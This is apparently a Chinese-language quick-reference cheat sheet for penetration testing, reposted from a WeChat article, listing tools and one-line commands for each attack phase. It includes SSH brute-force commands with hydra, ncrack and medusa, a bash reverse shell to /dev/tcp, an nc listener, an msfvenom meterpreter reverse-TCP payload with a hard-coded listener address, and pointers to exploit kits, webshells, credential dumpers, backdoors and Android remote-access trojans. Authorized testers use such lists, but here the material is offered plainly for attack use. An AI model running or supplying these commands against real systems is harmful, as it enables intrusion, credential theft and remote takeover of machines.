渗透测试各阶段工具速查(持续更新)
前言
本文是渗透测试各阶段工具和快速用法速查笔记,将会持续更新。转载于https://mp.weixin.qq.com/s/jqRqrWDp1vJAMtxx6Yr9cw。
站点信息收集
1 |
Google |
快速探测存活主机
nmap
1 |
nmap 172.18.2.1/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt |
格式化输出存活ip,做后续详细扫描使用
https://github.com/echohun/tools/blob/master/web%E6%89%AB%E6%8F%8F/nmap_clean_data.py
1 |
-sS:使用SYN方式扫描,默认用的是-sT方式,即TCP方式,需要完成完整的三次握手,比较费时,SYN就比较快一些了; |
Ipscan
快速探测端口
masscan的发包速度非常快,在windows中,它的发包速度可以达到每秒30万包;在Linux中,速度可以达到每秒160万。masscan在扫描时会随机选择目标IP,所以不会对远程的主机造成压力。
https://www.freebuf.com/sectool/112583.html
1 |
masscan 172.18.2.1 -p1-65535 --rate=10000 |
邮箱搜集工具
EmailSniper
子域名收集
SubDominscanner
指纹收集
whatweb -v http://baidu.com
web目录扫描
御剑
Dirbuster
https://www.jianshu.com/p/79c7b1eda56e
webpathbrute
漏洞扫描
wvs
burpsuite
nessus(强烈推荐)
xray
爆破
hydra
1 |
hydra -V -l fakeroot -P top100.txt 172.18.2.177 ssh |
ncrack
1 |
ncrack -vv -d10 -user root -P top100.txt 172.18.2.177 -p ssh -g CL=10,at=3 |
medusa
1 |
medusa -v 6 -h 172.18.2.177 -u fakeroot -P top100.txt -M ssh -t 10 -O out.txt |
漏洞利用
metasploit
burpsuite
sqlmap
xxer (xml注入利用工具) https://github.com/TheTwitchy/xxer
ysoserial (反序列化利用工具) https://github.com/frohoff/ysoserial
Struts2-Scan (struts2历史漏洞扫描和利用) https://github.com/HatBoy/Struts2-Scan
weblogicScanner (weblogic历史漏洞扫描利用) https://github.com/0xn0ne/weblogicScanner
exphub (常见web框架cve利用) https://github.com/zhzyker/exphub
cve,cms,中间件,OA系统漏洞exp合集
https://github.com/mai-lang-chai/Middleware-Vulnerability-detection
webshell
菜刀
蚁剑
冰蝎
cobalt strike
普通反弹shell
1 |
bash -i >& /dev/tcp/HOST/PORT 0>&1 |
加密shell
1 |
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes |
nc
1 |
攻击机 nc -lvp 4444 |
提权
各类exp
典型通杀:脏牛CVE-2016-5195
Metasploit
本地漏洞扫描工具
windows/linux exploit suggester
本地口令获取和破解
hash-identifier 判断哈希类型
mimikatz
Mimipenguin
1 |
--hash-type 0 --attack-mode 0 |
本地信息收集
Linuxprivchecker
LinEnum
后门
常见后门手法
metasploit
1 |
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f elf -o reverse_tcp_linux64 |
python直连反弹shell
http://next.uuzdaisuki.com/2018/06/17/%E5%9F%BA%E4%BA%8Epython%E7%9A%84%E7%9B%B4%E8%BF%9Eshell%E5%92%8C%E5%8F%8D%E5%B0%84shell/
其他语言直连反弹shell
windows常见奇淫技巧后门手法
http://next.uuzdaisuki.com/2018/06/18/windows%E5%B8%B8%E7%94%A8%E5%90%8E%E9%97%A8%E6%8A%80%E6%9C%AF%E5%8F%8A%E9%98%B2%E8%8C%83/
内网横向渗透
Hydra
nessus
metasploit
nmap
powersploit
Empire
Psnmap
lcx
ew
tunna
proxychains
FRP
N2N
内网命令执行和文件访问
at
schtasks
telnet
sc
wmic
wmiexec.vbs
python impacket wmiexec.py
psexec
远程桌面
arp欺骗
Cain
Arpspoof
远控
pupy类远控
teamview
pcanywhere
radmin
手机端
DroidJack
Dendroid
典型windows-rce
ms17-010 基本通杀
cve-2019-0708 开放3389情况 windows7及之前通杀
实用工具
q-dir 文件管理工具,可开四个窗口
beyond compare 文件/文本比较工具
cmder 命令行工具
everything 文件搜索工具
navicat 数据库连接工具,支持超多种类数据库,支持导出数据,甚至提供拖库的tunnel.php等
悬剑3.0 超齐全windows工具库系统